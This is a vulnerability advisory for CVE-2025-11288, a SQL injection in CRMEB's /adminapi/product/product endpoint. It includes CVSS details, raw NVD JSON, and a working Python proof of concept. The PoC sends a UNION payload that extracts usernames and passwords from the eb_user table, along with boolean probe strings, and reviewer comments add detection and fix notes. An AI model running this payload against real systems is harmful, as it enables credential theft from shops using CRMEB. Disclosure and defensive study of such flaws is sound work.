Security Vulnerability Report
CVE-2025-11288 CVSS 6.3 MEDIUM

CVE-2025-11288

Published: 2025-10-05 08:15:31
Last Modified: 2026-04-29 01:00:02

Description

A security flaw has been discovered in CRMEB up to 5.6. This issue affects some unknown processing of the file /adminapi/product/product of the component GET Parameter Handler. Performing a manipulation of the argument cate_id results in SQL injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
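CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L
Note: this is the assessment marked "Secondary" in the raw record below. The same record also carries a "Primary" CVSS 3.1 assessment of 8.8 HIGH (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H), so triaging on the headline 6.3 alone may under-rate the issue.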

Configurations (Affected Products)

cpe:2.3:a:crmeb:crmeb:*:*:*:*:*:*:*:* - VULNERABLE
CRMEB <= 5.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-11288 - CRMEB V5.6 SQL Injection PoC
# Vulnerable endpoint: /adminapi/product/product
# Vulnerable parameter: cate_id (GET)
# Author: coolcj-stack
#
# Reviewer notes (defensive reading of this listing):
# - Every request carries a PHPSESSID cookie, so the endpoint is reached with
#   an authenticated session; that matches PR:L in the advisory's CVSS vector.
# - Log/WAF signal: GET requests to /adminapi/product/product whose cate_id
#   contains quote characters or SQL keywords such as UNION/SELECT.
# - Remediation direction: bind cate_id as a query parameter and validate it
#   server-side (presumably a numeric category id - confirm against the
#   application). The advisory records no vendor response, so no fixed
#   release is named here.

import requests

# Target configuration (placeholder host; only meaningful in an authorized lab)
TARGET_URL = "http://target-crmeb-site.com"
ADMIN_API_PATH = "/adminapi/product/product"

# Session cookie of an existing low-privilege account (placeholder value)
SESSION_COOKIE = "your_admin_session_cookie_here"

# UNION-based payload delivered through cate_id, as published by the PoC author
INJECTION_PAYLOAD = "1' UNION SELECT id,username,password,'','','','','','','','','','','' FROM eb_user-- -"


def exploit_sql_injection():
    """
    Send the single UNION-based request against adminapi/product/product.

    Per the PoC author, cate_id is concatenated into the SQL query without
    sanitization. Returns the decoded JSON body on HTTP 200, otherwise None.

    NOTE(review): any HTTP 200 is reported as "Injection successful!"; the
    status code alone does not show that the injected SELECT was executed,
    so treat the printed verdict as unverified.
    """
    endpoint = TARGET_URL + ADMIN_API_PATH
    request_headers = {
        "Cookie": f"PHPSESSID={SESSION_COOKIE}",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    }
    query = {
        "cate_id": INJECTION_PAYLOAD,
        "page": "1",
        "limit": "20",
    }

    # No timeout is set, so this call can block indefinitely on a silent host.
    response = requests.get(url=endpoint, params=query, headers=request_headers)

    # Guard clause: anything other than 200 is reported and yields None.
    if response.status_code != 200:
        print(f"[-] Request failed with status code: {response.status_code}")
        return None

    print("[+] Injection successful!")
    print(f"[+] Response: {response.text}")
    # response.json() raises if the body is not JSON; the script does not catch it.
    return response.json()


def detect_injection():
    """
    Send three probe values for cate_id and print each response length.

    The function only prints; it never compares the lengths or returns a
    verdict, so interpreting the true/false pair is left to the operator.
    """
    probes = (
        "1'",             # Basic quote test
        "1' AND '1'='1",  # Boolean true test
        "1' AND '1'='2",  # Boolean false test
    )
    endpoint = TARGET_URL + ADMIN_API_PATH
    request_headers = {"Cookie": f"PHPSESSID={SESSION_COOKIE}"}

    for payload in probes:
        resp = requests.get(
            endpoint,
            params={"cate_id": payload},
            headers=request_headers,
        )
        print(f"[*] Testing payload: {payload}")
        print(f"[*] Response length: {len(resp.text)}")


if __name__ == "__main__":
    print("[*] CVE-2025-11288 - CRMEB V5.6 SQL Injection Exploit")
    print("[*] Detecting vulnerability...")
    detect_injection()
    print("\n[*] Exploiting vulnerability...")
    exploit_sql_injection()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-11288", "sourceIdentifier": "[email protected]", "published": "2025-10-05T08:15:31.143", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in CRMEB up to 5.6. This issue affects some unknown processing of the file /adminapi/product/product of the component GET Parameter Handler. Performing a manipulation of the argument cate_id results in sql injection. Remote exploitation of the attack is possible. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": 
"NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, 
"cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:crmeb:crmeb:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.6", "matchCriteriaId": "16ACC5CB-CAAA-4C45-AEEE-D60ABC2D7EA4"}]}]}], "references": [{"url": "https://github.com/coolcj-stack/CRMEB-V5.6-SQL-Injection/blob/main/README.md", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327046", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327046", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.659736", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/coolcj-stack/CRMEB-V5.6-SQL-Injection/blob/main/README.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Third Party Advisory"]}]}}